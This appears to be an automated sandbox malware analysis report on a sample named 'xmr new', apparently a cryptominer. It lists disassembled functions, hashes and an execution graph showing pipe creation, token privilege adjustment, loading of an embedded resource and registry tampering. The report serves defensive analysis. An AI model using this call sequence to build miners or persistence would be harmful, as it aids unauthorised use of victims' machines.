                          Function 0000012C42A836C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                          • String ID:
                          • API String ID: 449555515-0
                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                          • Instruction ID: 6df0b4ef28460142799fc1041bd1d58be44ba9417cd3aa82d3e55ca43eacd739
                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                          • Instruction Fuzzy Hash: EB015E7575178086FB24AB12E86A79F62A2FB44B85F084426CF4907765EF3CC1288781
                          Function 0000012C42A89005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 2395640692-629598281
                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction ID: 9c8ed4415c8a3fbd65cc7b90ffe9f318bb2375ba60db3e9658bffe4ca02c2804
                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction Fuzzy Hash: C851E73274528286FB94EF15E859BAE3797F344B88F108526DF0743788DB35C866C78A
                          Function 0000012C42A88FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 2395640692-629598281
                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction ID: 6ad2d857c3528e7a443b570d882572c027568fd622d80878d4a35996c227118c
                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction Fuzzy Hash: BA31F43128068186F754FF12E86A79F37A6F744BC8F048416EF4603788DB39C966C78A
                          Function 0000012C42A81A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: FinalHandleNamePathlstrlen
                          • String ID: \\?\
                          • API String ID: 2719912262-4282027825
                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                          • Instruction ID: 82df1c7a25760e5decefe7f847fcfe90ecb9c3d0903a131b87cdd059c3547151
                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                          • Instruction Fuzzy Hash: 6EF0817230068092F720AB22E8A539F6362F748B88F884022CF4947554DA3CC69DCB41
                          Function 0000012C42A83044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: CombinePath
                          • String ID: \\.\pipe\
                          • API String ID: 3422762182-91387939
                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                          • Instruction ID: efb3a7d5b582c7375fe703f790bbbf76817efd99412887909904636c7d20a381
                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                          • Instruction Fuzzy Hash: 51F08230744BC482FA00AB13B92519FA262EB48FC0F085572EF5647B18DF3CC4659741
                          Function 0000012C42A8BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                          • Instruction ID: 790e6fc5066d5bb7b9fd08a4acc6e85c1e69a4e702675ff02fd8da2b0eaedf3c
                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                          • Instruction Fuzzy Hash: 81F09C7135178481FB10AB25E86639F5362EB88BA5F540A17CF6A452F4DF3CC469D381
                          Function 0000012C42A850D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                          • Instruction ID: af1eb65154cb9ab694c7e2680f01428a93ee157aff2e5e19281cc9b225d42823
                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                          • Instruction Fuzzy Hash: B802B436259BC486EB60DB55E4A539FB7A2F384790F100016EF8E87BA8DF78C495CB41
                          Function 0000012C42A85710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                          • Instruction ID: dc88292a9b34a9bea5fe7c9c4e7fda35c727112ba8af89f3c0c9f14efd69d127
                          • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                          • Instruction Fuzzy Hash: EA61F736558A80C6F760AB15E46535FB7A2F388784F510117EF8E43BA8CB78C4618B81
                          Function 0000012C42A43504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID: _set_statfp
                          • String ID:
                          • API String ID: 1156100317-0
                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction ID: 76851ab78bee6c37ac8d53a068aec2354e1cd4fee4e7827af34db0ce6c05083b
                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction Fuzzy Hash: 4F11E7326D0AC209FA583128E4733EF90836B58374F78462AAF76062D6CA64C9B44183
                          Function 0000012C42A94104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: _set_statfp
                          • String ID:
                          • API String ID: 1156100317-0
                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction ID: 0728c804e2fd899d87f1ac3da6580149c85963ef1c193439c6b5bcd8643b4682
                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction Fuzzy Hash: 5311EB32AD0BC012F664355AD4773EF11436B783B4F284E26AF762B7D6CA24C4686582
                          Function 0000012C42A3F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                          • API String ID: 3215553584-4202648911
                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                          • Instruction ID: 72d3a4f6b16cf5c90b06f0b782e555c1e56e81c9b85a5c4d9d42ad5e3c549d6d
                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                          • Instruction Fuzzy Hash: EB61E5325A06C082FA65BB68E4733EF66A3F751780F544417DF0A877A4DBB4C86582C3
                          Function 0000012C42A8AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: CallEncodePointerTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3544855599-2084237596
                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction ID: bd79a731f0e787fe24cbf3ad6c694b4e75376b5f7d5a36f09758c1d052d502bc
                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction Fuzzy Hash: 7D618F73600B848AFB10EF65D4913DE77A2F744B88F044216EF8917B99DB78C5A6C781
                          Function 0000012C42A3A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                          • Instruction ID: 373efbaeee56cd4df186efbf32169bdfa68d2d2d0baaba463729f48fc3055769
                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                          • Instruction Fuzzy Hash: 4A51AD361803D0CAFB64AB5594663DE77A2F355B84F184217DF9987B96CB38C4B0C782
                          Function 0000012C42A8AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                          • Instruction ID: 1f3b02ed5d8dc2e626ab70b52c658eec3b71c213411d0e96eb23cb1a3d14d578
                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                          • Instruction Fuzzy Hash: 8051AF731407C08AFB64AB1591A539E77A2FB54B84F144117DF8947B96CB38D872CB82
                          Function 0000012C42A38405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritable__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 3242871069-629598281
                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction ID: 217ebb9bfe3e7f9364791fbb3e324261f1e888926af483ee17f216feb0b89b74
                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction Fuzzy Hash: DE51A9336412808FFB15EB25E426B9E37A7F350B98F518126EF1643788EB34C8608787
                          Function 0000012C42A383E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritable__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 3242871069-629598281
                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction ID: eb86cee583511a069396f2dd03c9fa17206ae54e1e1cc3ea02930369afc8c880
                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction Fuzzy Hash: 06319E72241780CAF715EF11E85679E77A6F340B98F158016EF5A03B85DB38C960C787
                          Function 0000012C42A92058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: FileWrite$ConsoleErrorLastOutput
                          • String ID:
                          • API String ID: 2718003287-0
                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                          • Instruction ID: f906c99cf24032752ed5bcbedbee92383b8e242c972a710a2ce55d61db0ccbb0
                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                          • Instruction Fuzzy Hash: 98D10032B04A8089F711DFAAD4513DE3BB2F385B98F108616CF5997B99DE34C426D781
                          Function 0000012C42A92980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: ConsoleErrorLastMode
                          • String ID:
                          • API String ID: 953036326-0
                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                          • Instruction ID: d5230eceb0c071f2196f3d1a78958f04e111cc64ee1595023089160414d78892
                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                          • Instruction Fuzzy Hash: D191C5327406D085F760AF3694623EE2BE2B754B8CF14490BDF0A57A94DE34C4A6E782
                          Function 0000012C42A87960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 2933794660-0
                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                          • Instruction ID: 3bd38fd944993b491b3cbbd1b23b927e024f024b6da6aa001fcbca1c48079ef4
                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                          • Instruction Fuzzy Hash: 7B111C36750F4189FB009B61E8663AE33A4F719B58F440E22DF6D477A4DB78C1A88381
                          Function 0000012C42A8253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                          • Instruction ID: 640e0e2ad5353589eee4782690a926c67d7035d334bde10d298748b97350fbb4
                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                          • Instruction Fuzzy Hash: 3E7192362407C186F725AE26A8663FF67A6F385B88F440027DF0A53B89DE35C566C781
                          Function 0000012C42A39E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID: CallTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3163161869-2084237596
                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction ID: b70efae07e47a05b633f2e383060704492170ab83de7b00d253f6161af5705cb
                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction Fuzzy Hash: 72619E33A00B848AFB20EF65D4513DE77A2F348B88F144216EF4917B99DB38D1A5CB85
                          Function 0000012C42A82330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                          • Instruction ID: 3c8c4a3abb68c98b6a37b1aae2c4fe19a3649003827a33dbb39d5b1b66d75047
                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                          • Instruction Fuzzy Hash: 5851C6322847C181F668EA29A4793FFA792F385784F440127DF9A03B59DE3DC52687D2
                          Function 0000012C42A926F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: ErrorFileLastWrite
                          • String ID: U
                          • API String ID: 442123175-4171548499
                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                          • Instruction ID: 40132a6a3651bd71a54c6c62f2268012e82cd67c3582f5f66d13962c38308ca9
                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                          • Instruction Fuzzy Hash: B141A332714A8086EB20AF26E8553EE77A2F798798F444422EF4D87794EF3CC451D781
                          Function 0000012C42A894A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: ExceptionFileHeaderRaise
                          • String ID: csm
                          • API String ID: 2573137834-1018135373
                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                          • Instruction ID: 8aa134b583d5003305a7fc17304788893c1aa239a2a38cff0e7e853950064dd3
                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                          • Instruction Fuzzy Hash: 4C115B36604B8082EB20DB15E41039EB7E2FB88B94F184221EF8C07758DF3CC566CB44
                          Function 0000012C42A37356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID: __std_exception_copy
                          • String ID: ierarchy Descriptor'$riptor at (
                          • API String ID: 592178966-758928094
                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                          • Instruction ID: 2a14d563370d01e9914297879026fc74ecbb63f411c6998ba4c33983398ea1d0
                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                          • Instruction Fuzzy Hash: DDE08671681B88D0EF019F21E8512DD33A2DB68B64B4891239E5C06311FA38D1F9C341
                          Function 0000012C42A373B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID: __std_exception_copy
                          • String ID: Locator'$riptor at (
                          • API String ID: 592178966-4215709766
                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                          • Instruction ID: b9be9b5e093d8f8472e258c3129dff0aeaf6e6daadb7f070c5e94cbfe91c5ce0
                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                          • Instruction Fuzzy Hash: AAE08671651B84D4EF019F21D4511DD7362E768B54B889123DE4C06311EA38D1F5C341
                          Function 0000012C42A81BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID:
                          • API String ID: 756756679-0
                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                          • Instruction ID: 3c2180239ca0570e48c79ecd267a6b32c5186b1115052a211cba50d5a6a7cc11
                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                          • Instruction Fuzzy Hash: A7118235641B8481FA44EB67A4192AE73A2FB89FC0F184026DF4D47765DE38C462D381
                          Function 0000012C42A81268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                          • Instruction ID: 37af5e6fa0dadea74f2d86d9ffd1b1174aafd81a2b729b296fba3e457ca98fe1
                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                          • Instruction Fuzzy Hash: DCE03935A4164486FB04AB63D82938A36E2EB89F46F1884258F0907361DF7D84A9DB91

                          Execution Graph

                          Execution Coverage:46%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:36.8%
                          Total number of Nodes:223
                          Total number of Limit Nodes:19
                          execution_graph 522 140002524 523 140002531 522->523 524 140002539 522->524 525 1400010c0 30 API calls 523->525 525->524 383 140002bf8 384 140002c05 383->384 386 140002c25 ConnectNamedPipe 384->386 387 140002c1a Sleep 384->387 393 140001b54 AllocateAndInitializeSid 384->393 388 140002c83 Sleep 386->388 389 140002c34 ReadFile 386->389 387->384 391 140002c8e DisconnectNamedPipe 388->391 390 140002c57 WriteFile 389->390 389->391 390->391 391->386 394 140001bb1 SetEntriesInAclW 393->394 395 140001c6f 393->395 394->395 396 140001bf5 LocalAlloc 394->396 395->384 396->395 397 140001c09 InitializeSecurityDescriptor 396->397 397->395 398 140001c19 SetSecurityDescriptorDacl 397->398 398->395 399 140001c30 CreateNamedPipeW 398->399 399->395 400 140002258 403 14000226c 400->403 427 140001f2c 403->427 406 140001f2c 14 API calls 407 14000228f GetCurrentProcessId OpenProcess 406->407 408 140002321 FindResourceExA 407->408 409 1400022af OpenProcessToken 407->409 412 140002341 SizeofResource 408->412 413 140002261 ExitProcess 408->413 410 1400022c3 LookupPrivilegeValueW 409->410 411 140002318 CloseHandle 409->411 410->411 414 1400022da AdjustTokenPrivileges 410->414 411->408 412->413 415 14000235a LoadResource 412->415 414->411 416 140002312 GetLastError 414->416 415->413 417 14000236e LockResource GetCurrentProcessId 415->417 416->411 441 1400017ec GetProcessHeap HeapAlloc 417->441 419 14000238b RegCreateKeyExW 420 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 419->420 421 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 419->421 422 14000250f SleepEx 420->422 423 1400023f4 RegSetKeySecurity LocalFree 421->423 424 14000240e RegCreateKeyExW 421->424 422->422 423->424 425 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 424->425 426 14000247f RegCloseKey 424->426 425->426 426->420 428 140001f35 StrCpyW StrCatW 